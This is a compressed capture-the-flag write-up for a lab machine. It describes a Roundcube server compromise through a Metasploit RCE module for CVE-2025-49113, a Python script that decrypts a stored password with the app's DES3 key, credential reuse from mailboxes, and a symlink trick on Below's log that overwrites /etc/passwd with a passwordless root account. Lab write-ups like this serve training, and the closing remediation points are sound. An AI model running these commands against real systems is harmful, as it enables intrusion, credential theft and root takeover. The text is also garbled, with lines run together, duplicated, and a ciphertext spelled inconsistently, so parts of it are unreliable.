encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/" des_key = b'rcmail-!24ByteDESkey*Str'
tyler / LhKL1o9Nm3X2nmap -A -p- 10.10.11.77 -T4
Open Ports:
http://mail.outbound.htb/Target ran Roundcube 1.6.10. Used Metasploit module:
exploit/multi/http/roundcube_auth_rce_cve_2025_49113
Authenticated with:
tyler / LhKL1o9Nm3X2From the host:
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube
DES3 key found:
rcmail-!24ByteDESkey*Str
Encrypted string:
L7Rv00A8TuwJAr67kITxxcSGnIk25Am/
Decrypt script:
from base64 import b64decode
from Crypto.Cipher import DES3
encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
des_key = b'rcmail-!24ByteDESkey*Str'
data = b64decode(encrypted_password)
iv = data[:8]
ciphertext = data[8:]
cipher = DES3.new(des_key, DES3.MODE_CBC, iv)
decrypted = cipher.decrypt(ciphertext)
cleaned = decrypted.rstrip(b"\x00").rstrip(b"\x08").decode('utf-8', errors='ignore')
print("[+] Пароль:", cleaned)
Recovered password:
595mO8DmwGeDSwitched to jacob with recovered credentials.
Mail discovery:
/home/jacob/mail/INBOX/jacob
Internal email revealed new credentials:
gY4Wr3a1evp4Mail from Mel also mentioned enabling the Below monitoring tool.
Below writes logs to /var/log/below/error_root.log. Abused symlink to overwrite /etc/passwd:
echo 'pwn::0:0:pwn:/root:/bin/bash' > /tmp/fakepass
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
cp /tmp/fakepass /var/log/below/error_root.log
su pwn
Result: Root shell.
User Flag: Not recorded in PDF
Root Flag: Not recorded in PDF
Patch Roundcube (CVE-2025-49113)
Protect Cryptographic Secrets
Harden Mailbox Access
Fix Below Log File Privileges
O_NOFOLLOW and secure log permissions.